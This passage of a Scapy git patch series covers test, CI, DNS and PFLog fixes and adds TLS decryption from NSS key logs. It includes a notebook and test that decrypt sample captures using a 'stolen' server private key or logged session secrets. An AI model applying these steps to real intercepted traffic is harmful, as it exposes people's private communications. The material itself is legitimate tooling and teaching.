as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = GMLAN() / GMLAN_NR(requestServiceId=0x23, returnCode=0x31) - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - ack = GMLAN() / GMLAN_RMBAPR(memoryAddress=0x0, dataRecord=payload) - time.sleep(0.1) - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = GMLAN() / GMLAN_NR(requestServiceId=0x23, returnCode=0x31) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + ack = GMLAN() / GMLAN_RMBAPR(memoryAddress=0x0, dataRecord=payload) + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1, retry=1) == payload - thread.join(timeout=5) - assert res - -+ Cleanup - -= Delete vcan interfaces - -assert cleanup_interfaces() +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1, retry=1) == payload +thread.join(timeout=5) +assert res diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 7c5fc1ee33b..4fad02d9b41 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -912,4 +912,4 @@ s = None = Delete vcan interfaces -assert cleanup_interfaces() \ No newline at end of file +assert cleanup_interfaces() From ab391d394d6c9dcbb8395eaaec99f55c8d5130cb Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 9 Oct 2021 22:28:19 +0200 Subject: [PATCH 0659/1632] Use macos 10.15 --- .github/workflows/unittests.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index df525595fa8..5628165cf97 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -89,10 +89,10 @@ jobs: mode: root installmode: 'libpcap' # MacOS tests - - os: macos-latest + - os: macos-10.15 python: 2.7 mode: both - - os: macos-latest + - os: macos-10.15 python: 3.9 mode: both steps: From 7ffd8101c1e535f9c3225db2c319958a64412686 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 14 Sep 2021 19:34:43 +0200 Subject: [PATCH 0660/1632] Check if the network interface still exists --- scapy/arch/linux.py | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 94fac8f077f..b86e98abf86 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -414,13 +414,17 @@ def load(self): data = {} ips = in6_getifaddr() for i in _get_if_list(): - ifflags = struct.unpack("16xH14x", get_if(i, SIOCGIFFLAGS))[0] - index = get_if_index(i) - mac = scapy.utils.str2mac( - get_if_raw_hwaddr(i, siocgifhwaddr=SIOCGIFHWADDR)[1] - ) - ip = None # type: Optional[str] - ip = inet_ntop(socket.AF_INET, get_if_raw_addr(i)) + try: + ifflags = struct.unpack("16xH14x", get_if(i, SIOCGIFFLAGS))[0] + index = get_if_index(i) + mac = scapy.utils.str2mac( + get_if_raw_hwaddr(i, siocgifhwaddr=SIOCGIFHWADDR)[1] + ) + ip = None # type: Optional[str] + ip = inet_ntop(socket.AF_INET, get_if_raw_addr(i)) + except IOError: + warning("Interface %s does not exist!", i) + continue if ip == "0.0.0.0": ip = None ifflags = FlagValue(ifflags, _iff_flags) From 8bdb1487b16adbcc009fe28f53fd14a535bcc323 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 19 Jul 2021 11:51:02 +0200 Subject: [PATCH 0661/1632] preserve rdlen when rdata is not a compressed DNS string --- scapy/layers/dns.py | 21 +++++++++++++++------ test/scapy/layers/dns.uts | 12 ++++++++++++ 2 files changed, 27 insertions(+), 6 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 9e03811357f..e89ce200808 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -128,7 +128,7 @@ def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): if bytes_left is None: bytes_left = s[pointer:] # name, end_index, remaining - return name, pointer, bytes_left + return name, pointer, bytes_left, len(processed_pointers) != 0 def dns_encode(x, check_built=False): @@ -161,7 +161,7 @@ def DNSgetstr(*args, **kwargs): "DNSgetstr is deprecated. Use dns_get_str instead.", DeprecationWarning ) - return dns_get_str(*args, **kwargs) + return dns_get_str(*args, **kwargs)[:-1] def dns_compress(pkt): @@ -265,6 +265,8 @@ class DNSStrField(StrLenField): It will also handle DNS decompression. (may be StrLenField if a length_from is passed), """ + __slots__ = ["compressed"] + def h2i(self, pkt, x): if not x: return b"." @@ -281,7 +283,7 @@ def getfield(self, pkt, s): if self.length_from: remain, s = super(DNSStrField, self).getfield(pkt, s) # Decode the compressed DNS message - decoded, _, left = dns_get_str(s, 0, pkt) + decoded, _, left, self.compressed = dns_get_str(s, 0, pkt) # returns (remaining, decoded) return left + remain, decoded @@ -337,8 +339,15 @@ def decodeRR(self, name, s, p): p += 10 cls = DNSRR_DISPATCHER.get(typ, DNSRR) rr = cls(b"\x00" + ret + s[p:p + rdlen], _orig_s=s, _orig_p=p) - # Will have changed because of decompression - rr.rdlen = None + + # Reset rdlen if DNS compression was used + for fname in rr.fieldtype.keys(): + rdata_obj = rr.fieldtype[fname] + if fname == "rdata" and isinstance(rdata_obj, MultipleTypeField): + rdata_obj = rdata_obj._find_fld_pkt_val(rr, rr.type)[0] + if isinstance(rdata_obj, DNSStrField) and rdata_obj.compressed: + del rr.rdlen + break rr.rrname = name p += rdlen @@ -356,7 +365,7 @@ def getfield(self, pkt, s): return s, b"" while c: c -= 1 - name, p, _ = dns_get_str(s, p, _fullpacket=True) + name, p, _, _ = dns_get_str(s, p, _fullpacket=True) rr, p = self.decodeRR(name, s, p) if ret is None: ret = rr diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 5d1903bdbff..f80f2f8202b 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -222,3 +222,15 @@ assert dns_encode(dns_encode(b"*")) == b'\x03\x01*\x00' = DNS - simple request assert raw(DNS()) == b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www\x07example\x03com\x00\x00\x01\x00\x01' + += DNS - preserve rdlen when rdata is not a compressed DNS string + +# RR type A +dnsrr1 = Raw(b'\x01a\x01b\x01c\x00\x00\x01\x10\x00\x00\x00\x00\x01\x00\x04\x01\x02\x03\x04') +# RR type NS & plain rdata +dnsrr2 = Raw(b'\x02ns\xc0\x0e\x00\x02\x10\x00\x00\x00\x00\x01\x00\x06\x01x\x01y\x01z') +# RR type NS & compressed rdata +dnsrr3 = Raw(b'\x02ns\xc0\x0e\x00\x02\x10\x00\x00\x00\x00\x01\x00\x07\x04test\xc0\x0e') + +d = DNS(raw(DNS(ancount=3, an=dnsrr1/dnsrr2/dnsrr3))) +assert d.an[0].rdlen == 4 and d.an[1].rdlen == 6 and d.an[2].rdlen is None From db1339931f0cf689a5afdc079a48e573c087f539 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 10 Oct 2021 14:02:35 +0200 Subject: [PATCH 0662/1632] Use a NSS Key Log file to decrypt a TLS session (#3374) * Use a NSS Key Log file to decrypt a TLS session * Decrypting TLS 1.2 using a known master secret * Test TLS 1.2 decryption using a NSS Key Log --- .../tls/notebook3_tls_compromised.ipynb | 180 +++++++++++++++--- .../tls/raw_data/tls_nss_example.keys.txt | 2 + .../tls/raw_data/tls_nss_example.pcap | Bin 0 -> 4208 bytes scapy/layers/tls/session.py | 75 +++++++- test/tls.uts | 13 ++ 5 files changed, 240 insertions(+), 30 deletions(-) create mode 100644 doc/notebooks/tls/raw_data/tls_nss_example.keys.txt create mode 100644 doc/notebooks/tls/raw_data/tls_nss_example.pcap diff --git a/doc/notebooks/tls/notebook3_tls_compromised.ipynb b/doc/notebooks/tls/notebook3_tls_compromised.ipynb index 8c0e5d3ba5d..c6e75010328 100644 --- a/doc/notebooks/tls/notebook3_tls_compromised.ipynb +++ b/doc/notebooks/tls/notebook3_tls_compromised.ipynb @@ -4,15 +4,17 @@ "cell_type": "markdown", "metadata": {}, "source": [ - "# The lack of PFS: a danger to privacy" + "# The lack of PFS: a danger to privacy\n", + "\n", + "With TLS 1.2 and earlier, some cipher suites do not provide Perfect Forward Secrecy. Without this property, an attacker compromising the server private key can easily decrypt TLS traffic.\n", + "\n", + "In the following example, Scapy is used to decrypt a comunication made without PFS using the ciphersuite `TLS_RSA_WITH_AES_128_CBC_SHA`, giving the server private key stored in `raw_data/pki/srv_key.pem`." ] }, { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": true - }, + "metadata": {}, "outputs": [], "source": [ "from scapy.all import *\n", @@ -22,9 +24,7 @@ { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": false - }, + "metadata": {}, "outputs": [], "source": [ "record1_str = open('raw_data/tls_session_compromised/01_cli.raw', 'rb').read()\n", @@ -36,7 +36,6 @@ "cell_type": "code", "execution_count": null, "metadata": { - "collapsed": false, "scrolled": true }, "outputs": [], @@ -49,23 +48,19 @@ { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": true - }, + "metadata": {}, "outputs": [], "source": [ - "# Suppose we possess the private key of the server\n", - "# Try registering it to the session\n", - "#key = PrivKey('raw_data/pki/srv_key.pem')\n", - "#record2.tls_session.server_rsa_key = key" + "# Supposing that the private key of the server was stolen,\n", + "# the traffic can be decoded by registering it to the Scapy TLS session\n", + "key = PrivKey('raw_data/pki/srv_key.pem')\n", + "record2.tls_session.server_rsa_key = key" ] }, { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": false - }, + "metadata": {}, "outputs": [], "source": [ "record3_str = open('raw_data/tls_session_compromised/03_cli.raw', 'rb').read()\n", @@ -76,9 +71,7 @@ { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": false - }, + "metadata": {}, "outputs": [], "source": [ "record4_str = open('raw_data/tls_session_compromised/04_srv.raw', 'rb').read()\n", @@ -89,34 +82,163 @@ { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": false - }, + "metadata": {}, "outputs": [], "source": [ + "# This is the first TLS Record containing user data. If decryption works,\n", + "# you should see the string \"To boldly go where no man has gone before...\" in plaintext.\n", "record5_str = open('raw_data/tls_session_compromised/05_cli.raw', 'rb').read()\n", "record5 = TLS(record5_str, tls_session=record4.tls_session.mirror())\n", "record5.show()" ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# Decrypting TLS Traffic Protected with PFS\n", + "\n", + "When PFS is in action, the only way to break TLS 1.2 is to possess decryption keys. They can be retrieved by dumping the process memory, or making the TLS library to write then into a [NSS Key Log](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/Key_Log_Format) (as allowed by OpenSSL, Chrome or Firefox).\n", + "\n", + "The data used in the following examples was retrieved the following commands:\n", + "```\n", + "cd doc/notebooks/tls/raw_data/\n", + "\n", + "# Start a TLS 1.12 Server using the s_server\n", + "sudo openssl s_server -accept localhost:443 -cert pki/srv_cert.pem -key pki/srv_key.pem -WWW -tls1_2\n", + "\n", + "# Sniff the network and write packets to a file\n", + "sudo tcpdump -i lo -w tls_nss_example.pcap port 443\n", + "\n", + "# Connect to the server using s_client and retrieve the secrets.txt file\n", + "openssl s_client -connect localhost:443 -keylogfile tls_nss_example.keys.txt\n", + "```\n", + "\n", + "## Decrypt a PCAP files\n", + "\n", + "Scapy can parse NSS Key logs, and use the cryptographic material to decrypt TLS traffic from a pcap file." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "load_layer(\"tls\")\n", + "\n", + "conf.tls_session_enable = True\n", + "conf.tls_nss_filename = \"raw_data/tls_nss_example.keys.txt\"\n", + "\n", + "packets = rdpcap(\"raw_data/tls_nss_example.pcap\")" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Display the HTTP GET query\n", + "packets[11][TLS].show()" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Display the answer containing the secret\n", + "packets[13][TLS].show()" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## Decrypt Manually\n", + "\n", + "Internally, the `conf.tls_session_enable` parameter makes Scapy follows TCP records, such as Client Hello or Server Hello, and updates `tlsSession` objects.\n", + "\n", + "Scapy inner behavior is illustrated by the following example." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Read packets from a pcap\n", + "load_layer(\"tls\")\n", + "\n", + "packets = rdpcap(\"raw_data/tls_nss_example.pcap\")\n", + "\n", + "# Load the keys from a NSS Key Log\n", + "nss_keys = load_nss_keys(\"raw_data/tls_nss_example.keys.txt\")" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Parse the Client Hello message from its raw bytes. This configures a new tlsSession object\n", + "client_hello = TLS(raw(packets[3][TLS]))\n", + "\n", + "# Parse the Server Hello message, using the mirrored client_hello tlsSession object\n", + "server_hello = TLS(raw(packets[5][TLS]), tls_session=client_hello.tls_session.mirror())\n", + "\n", + "# Configure the TLS master secret retrieved from the NSS Key Log\n", + "server_hello.tls_session.master_secret = nss_keys[\"CLIENT_RANDOM\"][\"Secret\"]\n", + "\n", + "# Parse remaining TLS messages\n", + "client_finished = TLS(raw(packets[7][TLS]), tls_session=server_hello.tls_session.mirror())\n", + "server_finished = TLS(raw(packets[9][TLS]), tls_session=client_finished.tls_session.mirror())" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Display the HTTP GET query\n", + "http_query = TLS(raw(packets[11][TLS]), tls_session=server_finished.tls_session.mirror())\n", + "http_query.show()" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Display the answer containing the secret\n", + "http_response = TLS(raw(packets[13][TLS]), tls_session=http_query.tls_session.mirror())\n", + "http_response.show()" + ] } ], "metadata": { "kernelspec": { - "display_name": "Python 2", + "display_name": "Python 3 (ipykernel)", "language": "python", - "name": "python2" + "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", - "version": 2 + "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", - "pygments_lexer": "ipython2", - "version": "2.7.13" + "pygments_lexer": "ipython3", + "version": "3.9.1" } }, "nbformat": 4, diff --git a/doc/notebooks/tls/raw_data/tls_nss_example.keys.txt b/doc/notebooks/tls/raw_data/tls_nss_example.keys.txt new file mode 100644 index 00000000000..69734b2585b --- /dev/null +++ b/doc/notebooks/tls/raw_data/tls_nss_example.keys.txt @@ -0,0 +1,2 @@ +# SSL/TLS secrets log file, generated by OpenSSL +CLIENT_RANDOM c43c799f04ad31e397ee4fe14c8819a19bf5951bbc545cada407c6c7589e60ab b599798159244555ddd10d80b5552a37d327fd6e661f3520194c28ef6e8bb0af6e3fb4d4f9945a61e83a41f2345fa27a diff --git a/doc/notebooks/tls/raw_data/tls_nss_example.pcap b/doc/notebooks/tls/raw_data/tls_nss_example.pcap new file mode 100644 index 0000000000000000000000000000000000000000..f03811d0c874643e541d58a65167f68bcfedb591 GIT binary patch literal 4208 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 Dict[str, bytes] + """ + Parses a NSS Keys log and returns unpacked keys in a dictionary. + """ + keys = {} + try: + fd = open(filename) + except FileNotFoundError: + warning("Cannot open NSS Key Log: %s", filename) + return {} + else: + with open(filename) as fd: + for line in fd: + if line.startswith("#"): + continue + data = line.strip().split(" ") + if len(data) != 3 or data[0] != data[0].upper(): + warning("Invalid NSS Key Log Entry: %s", line.strip()) + return {} + + try: + client_random = binascii.unhexlify(data[1]) + except binascii.Error: + warning("Invalid ClientRandom: %s", data[1]) + return {} + + try: + secret = binascii.unhexlify(data[2]) + except binascii.Error: + warning("Invalid Secret: %s", data[2]) + return {} + + # Warn that a duplicated entry was detected. The latest one + # will be kept in the resulting dictionary. + if data[0] in keys: + warning("Duplicated entry for %s !", data[0]) + + keys[data[0]] = {"ClientRandom": client_random, + "Secret": secret} + return keys + + # Note the following import may happen inside connState.__init__() # in order to avoid to avoid cyclical dependencies. # from scapy.layers.tls.crypto.suites import TLS_NULL_WITH_NULL_NULL @@ -366,6 +414,10 @@ def __init__(self, self.server_rsa_key = None # self.server_ecdsa_key = None + # A dictionary containing keys extracted from a NSS Keys Log using + # the load_nss_keys() function. + self.nss_keys = None + # Back in the dreadful EXPORT days, US servers were forbidden to use # RSA keys longer than 512 bits for RSAkx. When their usual RSA key # was longer than this, they had to create a new key and send it via @@ -546,7 +598,14 @@ def compute_master_secret(self): log_runtime.debug("TLS: master secret: %s", repr_hex(ms)) def compute_ms_and_derive_keys(self): - self.compute_master_secret() + # Load the master secret from an NSS Key dictionary + if self.nss_keys and self.nss_keys.get("CLIENT_RANDOM", False) and \ + self.nss_keys["CLIENT_RANDOM"].get("Secret", False): + self.master_secret = self.nss_keys["CLIENT_RANDOM"]["Secret"] + + if not self.master_secret: + self.compute_master_secret() + self.prcs.derive_keys(client_random=self.client_random, server_random=self.server_random, master_secret=self.master_secret) @@ -894,15 +953,25 @@ def __init__(self, _pkt="", post_transform=None, _internal=0, self.tls_session.ipdst = tcp.underlayer.dst except AttributeError: pass + + # Load a NSS Key Log file + if conf.tls_nss_filename is not None: + if conf.tls_nss_keys is None: + conf.tls_nss_keys = load_nss_keys(conf.tls_nss_filename) + if conf.tls_session_enable: if newses: s = conf.tls_sessions.find(self.tls_session) if s: + if conf.tls_nss_keys is not None: + s.nss_keys = conf.tls_nss_keys if s.dport == self.tls_session.dport: self.tls_session = s else: self.tls_session = s.mirror() else: + if conf.tls_nss_keys is not None: + self.tls_session.nss_keys = conf.tls_nss_keys conf.tls_sessions.add(self.tls_session) if self.tls_session.connection_end == "server": srk = conf.tls_sessions.server_rsa_key @@ -1110,3 +1179,7 @@ def toPacketList(self): conf.tls_sessions = _tls_sessions() conf.tls_session_enable = False conf.tls_verbose = False +# Filename containing NSS Keys Log +conf.tls_nss_filename = None +# Dictionary containing parsed NSS Keys +conf.tls_nss_keys = None diff --git a/test/tls.uts b/test/tls.uts index d172783799d..9f7cbed19f0 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1565,3 +1565,16 @@ assert [type(x) for x in pkt.msg] == [TLSServerHello, TLSCertificate, TLSCertifi # see test/tls/tests_tls_netaccess.uts +############################################################################### +####################### Decrypt packets from a pcap ########################## +############################################################################### + +bck_conf = conf +conf.tls_session_enable = True +conf.tls_nss_filename = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.keys.txt") + +packets = rdpcap(scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.pcap")) +assert b"GET /secret.txt HTTP/1.0\n" in packets[11].msg[0].data +assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data + +conf = bck_conf From 5fab871535562dc5e0b12b1951630307dca38609 Mon Sep 17 00:00:00 2001 From: tedbe Date: Mon, 16 Nov 2020 11:29:06 +0100 Subject: [PATCH 0663/1632] Fix OpenBSD PFLog Layer --- scapy/layers/pflog.py | 61 ++++++++++++--- test/scapy/layers/pflog.uts | 152 ++++++++++++++++++++++++++++++++++++ 2 files changed, 201 insertions(+), 12 deletions(-) create mode 100644 test/scapy/layers/pflog.uts diff --git a/scapy/layers/pflog.py b/scapy/layers/pflog.py index 65e3e517c58..a8d60d8e86d 100644 --- a/scapy/layers/pflog.py +++ b/scapy/layers/pflog.py @@ -7,24 +7,37 @@ PFLog: OpenBSD PF packet filter logging. """ -import socket - from scapy.data import DLT_PFLOG from scapy.packet import Packet, bind_layers -from scapy.fields import ByteEnumField, ByteField, IntField, SignedIntField, \ - StrFixedLenField +from scapy.fields import ByteEnumField, ByteField, IntField, \ + IPField, IP6Field, MultipleTypeField, PadField, ShortField, \ + SignedIntField, StrFixedLenField, YesNoByteField from scapy.layers.inet import IP from scapy.config import conf if conf.ipv6_enabled: from scapy.layers.inet6 import IPv6 +# from OpenBSD src/sys/sys/socket.h +# define AF_INET 2 +# define AF_INET6 24 +OPENBSD_AF_INET = 2 +OPENBSD_AF_INET6 = 24 + +# from OpenBSD src/sys/net/if_pflog.h +# define PFLOG_HDRLEN sizeof(struct pfloghdr) +PFLOG_HDRLEN = 100 + class PFLog(Packet): + """ + Class for handling PFLog headers + """ name = "PFLog" - # from OpenBSD src/sys/net/pfvar.h and src/sys/net/if_pflog.h - fields_desc = [ByteField("hdrlen", 0), - ByteEnumField("addrfamily", 2, {socket.AF_INET: "IPv4", - socket.AF_INET6: "IPv6"}), + # from OpenBSD src/sys/net/pfvar.h + # and src/sys/net/if_pflog.h (struct pfloghdr) + fields_desc = [ByteField("hdrlen", PFLOG_HDRLEN), + ByteEnumField("addrfamily", 2, {OPENBSD_AF_INET: "IPv4", + OPENBSD_AF_INET6: "IPv6"}), ByteEnumField("action", 1, {0: "pass", 1: "drop", 2: "scrub", 3: "no-scrub", 4: "nat", 5: "no-nat", @@ -53,14 +66,38 @@ class PFLog(Packet): IntField("rulepid", 0), ByteEnumField("direction", 255, {0: "inout", 1: "in", 2: "out", 255: "unknown"}), - StrFixedLenField("pad", b"\x00\x00\x00", 3)] + YesNoByteField("rewritten", 0), + ByteEnumField("naddrfamily", 2, {OPENBSD_AF_INET: "IPv4", + OPENBSD_AF_INET6: "IPv6"}), + StrFixedLenField("pad", b"\x00", 1), + MultipleTypeField( + [ + (PadField(IPField("saddr", "127.0.0.1"), + 16, padwith=b"\x00"), + lambda pkt: pkt.addrfamily == OPENBSD_AF_INET), + (IP6Field("saddr", "::1"), + lambda pkt: pkt.addrfamily == OPENBSD_AF_INET6), + ], + PadField(IPField("saddr", "127.0.0.1"), + 16, padwith=b"\x00"),), + MultipleTypeField( + [ + (PadField(IPField("daddr", "127.0.0.1"), + 16, padwith=b"\x00"), + lambda pkt: pkt.addrfamily == OPENBSD_AF_INET), + (IP6Field("daddr", "::1"), + lambda pkt: pkt.addrfamily == OPENBSD_AF_INET6), + ], + PadField(IPField("daddr", "127.0.0.1"), + 16, padwith=b"\x00"),), + ShortField("sport", 0), + ShortField("dport", 0), ] def mysummary(self): return self.sprintf("%PFLog.addrfamily% %PFLog.action% on %PFLog.iface% by rule %PFLog.rulenumber%") # noqa: E501 -bind_layers(PFLog, IP, addrfamily=socket.AF_INET) -if conf.ipv6_enabled: - bind_layers(PFLog, IPv6, addrfamily=socket.AF_INET6) +bind_layers(PFLog, IP, addrfamily=OPENBSD_AF_INET) +bind_layers(PFLog, IPv6, addrfamily=OPENBSD_AF_INET6) conf.l2types.register(DLT_PFLOG, PFLog) diff --git a/test/scapy/layers/pflog.uts b/test/scapy/layers/pflog.uts new file mode 100644 index 00000000000..dcf8c6fecfa --- /dev/null +++ b/test/scapy/layers/pflog.uts @@ -0,0 +1,152 @@ +% Regression tests for the PFLog layer + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ + ++ Multiple operations of PFLog packets dissections + += Load module + +load_layer("pflog") +from io import BytesIO + += Dissect PFLog packet of a IP()/TCP() dropped packet + +pcap_pflog_tcp = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x00\x89*\xce_}\xcf\x07\x00\xa4\x00\x00\x00\xa4\x00\x00\x00d\x02\x01\x00vio0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00\x84S\x01\x00\x01\x00\x02\x00\n\xc8\xc8\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xc8\xc8\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa3\xbd\x00\x17E\x00\x00@c\xae@\x00@\x06/\xe1\n\xc8\xc8\xfe\n\xc8\xc8\x9a\xa3\xbd\x00\x17\xc8\xc9\xd9\xf2\x00\x00\x00\x00\xb0\x02@\x00.l\x00\x00\x02\x04\x05\xb4\x01\x01\x04\x02\x01\x03\x03\x06\x01\x01\x08\n\x86\xb8S\x1c\x00\x00\x00\x00') +pflog_tcp_packets = rdpcap(pcap_pflog_tcp) +# PFLog Layer +assert pflog_tcp_packets[0][PFLog].hdrlen == 100 +assert pflog_tcp_packets[0][PFLog].addrfamily == 2 # IPv4 +assert pflog_tcp_packets[0][PFLog].action == 1 # drop +assert pflog_tcp_packets[0][PFLog].saddr == '10.200.200.254' +assert pflog_tcp_packets[0][PFLog].daddr == '10.200.200.154' +# IP Layer +assert pflog_tcp_packets[0][IP].proto == 6 +assert pflog_tcp_packets[0][IP].src == '10.200.200.254' +assert pflog_tcp_packets[0][IP].dst == '10.200.200.154' +# TCP Layer +assert pflog_tcp_packets[0][TCP].dport == 23 + += Dissect PFLog packet of a IP()/UDP() dropped packet + +pcap_pflog_udp = 